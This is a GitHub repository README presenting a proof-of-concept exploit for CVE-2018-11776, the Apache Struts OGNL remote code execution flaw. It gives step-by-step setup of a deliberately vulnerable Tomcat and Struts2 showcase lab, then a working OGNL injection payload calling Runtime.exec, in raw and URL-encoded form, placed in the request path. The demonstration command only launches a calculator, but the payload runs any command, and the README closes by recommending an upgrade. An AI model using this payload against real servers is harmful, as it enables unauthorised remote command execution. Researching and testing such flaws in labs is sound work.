├── .github
    └── FUNDING.yml
└── README.md


/.github/FUNDING.yml:
--------------------------------------------------------------------------------
1 | patreon: forrestsux
2 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # CVE-2018-11776
  2 | 
  3 | Proof of Concept exploit so I could quickly assess what sorts of protections and fixes are available.
  4 | 
  5 | Originally found by Man Yue Mo, Semmle: https://semmle.com/news/apache-struts-CVE-2018-11776
  6 | 
  7 | Semmle had a "Apache Struts RCE - CVE-2018-11776 - PoC Exploit Demo" YouTube video up for a bit, but I believe it's gone or, at least, no longer linked to Semmle: https://www.youtube.com/watch?v=5SDNX20SLJ0
  8 | 
  9 | Took information from the above and then started looking at the commits to the struts repo: https://github.com/apache/struts/commit/6e87474f9ad0549f07dd2c37d50a9ccd0977c6e5 
 10 | 
 11 | 
 12 | I'm too lazy to Docker or whatever the fuck...
 13 | 
 14 | ## Setting up and Exploiting a Vulnerable Host
 15 | ### Download latest Ubuntu Desktop ISO and create a virtual machine.
 16 | http://releases.ubuntu.com/18.04.1/ubuntu-18.04.1-desktop-amd64.iso?_ga=2.265574989.317727484.1535056103-825490018.1535056103
 17 | 
 18 | ### Install dependencies:
 19 | sudo apt-get update
 20 | 
 21 | sudo apt-get upgrade
 22 | 
 23 | sudo apt-get dist-upgrade
 24 | 
 25 | sudo apt-get install default-jdk vim net-tools
 26 | 
 27 | 
 28 | ### Set up Tomcat:
 29 | mkdir ~/sources
 30 | 
 31 | cd ~/sources
 32 | 
 33 | wget http://mirrors.ocf.berkeley.edu/apache/tomcat/tomcat-7/v7.0.90/bin/apache-tomcat-7.0.90.tar.gz
 34 | 
 35 | tar xvzf apache-tomcat-7.0.90.tar.gz
 36 | 
 37 | sudo mv apache-tomcat-7.0.90 /opt/tomcat
 38 | 
 39 | 
 40 | ### Update bashrc with variables:
 41 | vim ~/.bashrc
 42 | 
 43 | export JAVA_HOME=/usr/lib/jvm/default-java
 44 | 
 45 | export CATALINA_HOME=/opt/tomcat
 46 | 
 47 | . ~/.bashrc
 48 | 
 49 | 
 50 | ### Add an admin to the Tomact gui:
 51 | sudo vim /opt/tomcat/conf/tomcat-users.xml
 52 | 
 53 | 	<user username="username" password="password" roles="manager-gui,admin-gui" />
 54 | 
 55 | 	
 56 | ### Get a vulnerable Struts2 Showcase so we have something to work with:
 57 | cd ~/sources
 58 | 
 59 | wget http://central.maven.org/maven2/org/apache/struts/struts2-showcase/2.3.14/struts2-showcase-2.3.14.war
 60 | 
 61 | 
 62 | ### Deploy the WAR file through the Tomcat gui:
 63 | $CATALINA_HOME/bin/shutdown.sh
 64 | 
 65 | $CATALINA_HOME/bin/startup.sh
 66 | 
 67 | http://127.0.0.1:8080/manager/html
 68 | 
 69 | 
 70 | ### Restart Tomcat and check that the Struts2 Showcase is available:
 71 | $CATALINA_HOME/bin/shutdown.sh
 72 | 
 73 | $CATALINA_HOME/bin/startup.sh
 74 | 
 75 | http://127.0.0.1:8080/manager/html
 76 | 
 77 | 
 78 | ### Add a vulnerable redirection action without a namespace:
 79 | vim /opt/tomcat/webapps/struts2-showcase-2.3.14/WEB-INF/classes/struts.xml
 80 | 
 81 |         <action name="help">
 82 |                 <result type="redirectAction">
 83 |                         <param name="actionName">date.action</param>
 84 |                 </result>
 85 |         </action>
 86 | 
 87 | 
 88 | date.action is already defined, so we just added another redirect action that calls date.action
 89 | 
 90 | By default, alwaysSelectFullNamespace should be set to True.
 91 | 
 92 | 
 93 | ### Restart Tomcat and check out the Struts2 Showcase page:
 94 | $CATALINA_HOME/bin/shutdown.sh
 95 | 
 96 | $CATALINA_HOME/bin/startup.sh
 97 | 
 98 | http://127.0.0.1:8080/struts2-showcase-2.3.14/showcase.jsp
 99 | 
100 | 
101 | ### Create OGNL expression to do stuff. Let's do what Semmle probably did in their YouTube video:
102 | %{(#_memberAccess['allowStaticMethodAccess'] = true).(#rt = @java.lang.Runtime@getRuntime()).(#rt.exec('gnome-calculator'))}
103 | 
104 | ### OGNL expression needs to be URL-encoded and stuck in before the last '/' in the URL, hitting our vulnerable help.action:
105 | 127.0.0.1:8080/struts2-showcase-2.3.14/\<encoded-command-goes-here\>/help.action
106 | 
107 | 127.0.0.1:8080/struts2-showcase-2.3.14/%25%7B%28%23%5F%6D%65%6D%62%65%72%41%63%63%65%73%73%5B%27%61%6C%6C%6F%77%53%74%61%74%69%63%4D%65%74%68%6F%64%41%63%63%65%73%73%27%5D%20%3D%20%74%72%75%65%29%2E%28%23%72%74%20%3D%20%40%6A%61%76%61%2E%6C%61%6E%67%2E%52%75%6E%74%69%6D%65%40%67%65%74%52%75%6E%74%69%6D%65%28%29%29%2E%28%23%72%74%2E%65%78%65%63%28%27%67%6E%6F%6D%65%2D%63%61%6C%63%75%6C%61%74%6F%72%27%29%29%7D/help.action
108 | 
109 | 
110 | Executing on the vulnerable Ubuntu host, we should see a new calc instance pop up.
111 | 
112 | ### Related commits fixing the issue:
113 | https://github.com/apache/struts/commit/6e87474f9ad0549f07dd2c37d50a9ccd0977c6e5
114 | 
115 | 
116 | ## Thoughts:
117 | Another extremely specific, vulnerable implementation of struts. The media coverage of this vulnerability had everyone freaking out, though only the sloppiest code/configs are really vulnerable... I can't think of an efficient, stealthy way of reliably finding this vulnerability and/or exploiting it. My recommendation: just fucking upgrade struts... (or stop using it)
118 | 


--------------------------------------------------------------------------------